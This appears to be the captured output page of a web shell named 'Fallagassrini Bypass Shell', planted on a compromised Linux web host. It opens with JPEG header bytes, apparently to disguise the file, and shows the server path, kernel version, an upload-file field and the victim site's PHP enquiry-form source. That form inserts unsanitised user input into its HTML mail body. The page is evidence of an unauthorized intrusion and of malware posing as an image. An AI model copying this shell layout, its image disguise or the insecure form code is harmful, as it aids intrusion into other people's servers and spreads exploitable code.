JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/public_html/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/public_html/sendenquiry.php

<?php
$msgsend='';
//=========== Enquiry form ===================
if($_SERVER['REQUEST_METHOD']=="POST" && $_REQUEST["btnsend"]=="Send")
{
	
		$fullname=$_REQUEST["fname"];
		$jsemail="efficientindustrial@gmail.com>";
		$headers = "From: <noreply@efficientindustrial.com>\n";
		$headers .= "Reply-To: <noreply@efficientindustrial.com>\n";
		$headers .= "MIME-Version: 1.0\n";
		$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
		$subject  = "Apply online Details of ".$fullname;
		$sending_mail_body='<html><head>
		<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
		</head>
		<body>';
		$sending_mail_body.='<table cellpadding="0" cellspacing="0" width="100%" border="0">
		<tr>
		<td> Name : '.$fullname.',</td>  
		</tr>
		<tr>
		<td> Email : '.$_REQUEST["email"].',</td>
		</tr>
		<tr>
		<td> Mobile No : '.$_REQUEST["mobno"].',</td>
		</tr>		
		<tr>
		<td> Enquiry : '.$_REQUEST["keyskill"].',</td>
		</tr>		
		</table>';		
		$sending_mail_body.='</body>
		</html>';
		
		/*echo $jsemail."<br>";
		echo $subject."<br>";
		echo $sending_mail_body."<br>";
		echo $headers."<br>";
		die;*/
		$msgsend="We have receive your request, we will contact very soon.";
		$sendmail= mail($jsemail,$subject,$sending_mail_body,$headers);
		
}
?>

<script language="javascript" type="text/javascript">
function validatefrm()
{
	               
	
	var fname=document.frmchk.fname.value;
	var email=document.frmchk.email.value;
	var mobno=document.frmchk.mobno.value;
	//var dob=document.frmchk.dob.value;
	//var matstatus=document.frmchk.matstatus.value;
	//var selgender=document.frmchk.selgender.value;
	//var usradd=document.frmchk.usradd.value;
	var keyskill=document.frmchk.keyskill.value;
	//var usrqualification=document.frmchk.usrqualification.value;

	if(fname=="")
	{
		alert("Name should not be blank.");
		document.frmchk.fname.focus();
		return false;
	}
	else if(email=="")
	{
		alert("Email should not be blank.");
		document.frmchk.email.focus();
		return false;
	}
	else if(mobno=="")
	{
		alert("Mobile No. should not be blank.");
		document.frmchk.mobno.focus();
		return false;
	}
	else if(isNaN(mobno))
	{
		alert("Mobile No. should be number.");
		document.frmchk.mobno.focus();
		return false;
	}	
	else if(keyskill=="")
	{
		alert("Enquiry should not be blank.");
		document.frmchk.keyskill.focus();
		return false;
	}
	

}
</script>
<h1>Send Enquiry</h1>
    
             <form name="frmchk" id="frmchk" method="post" action="" onSubmit="return validatefrm();">            
                    <table width="100%" border="0" cellspacing="0" cellpadding="2" style="color:#000; font-family:Verdana, Geneva, sans-serif; font-size:12px; line-height:18px; padding-left:10px; background:none; border:none;">
                    <?php if(isset($msgsend) && !empty($msgsend)){?>
                    <tr>
                    <td align="center"><b><?php echo $msgsend;?></b></td>
                    </tr>
                    <?php }?>
                    <tr style="background:none;border:none;">
                    <td><b style="font-size:12px;"><span style="color:#F00;">*</span>Name : </b><br />
                    <div style="height:5px;"></div>
                    <input type="text" name="fname" id="fname" value="" style="width:275px; height:20px;" /></td>
                    </tr>
                    <tr style="background:none;border:none;">
                    <td><b style="font-size:12px;"><span style="color:#F00;">*</span>Email : </b><br />
                    <div style="height:5px;"></div>
                    <input type="text" name="email" id="email" value="" style="width:275px;height:20px;" /></td>
                    </tr>
                    <tr style="background:none;border:none;">
                    <td><b style="font-size:12px;"><span style="color:#F00;">*</span>Mobile No. : </b><br />
                    <div style="height:5px;"></div>
                    <input type="text" name="mobno" id="mobno" value="" style="width:275px; height:20px;" /></td>
                    </tr>
                    <tr style="background:none;border:none;">
                    <td><b style="font-size:12px;"><span style="color:#F00;">*</span>Enquiry : </b><br />
                    <div style="height:5px;"></div>
                    <textarea rows="5" style="width:275px; " name="keyskill" id="keyskill"></textarea></td>
                    </tr> 
                     <tr style="background:none;border:none;">
                    <td><input type="submit" name="btnsend" id="btnsend" style="font-weight:bold; font-size:16px;" value="Send" /></td>
                    </tr>
                    <tr style="background:none;border:none;">
                    <td height="5"></td>
                    </tr>
                    </table>
				</form>
        	
            

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net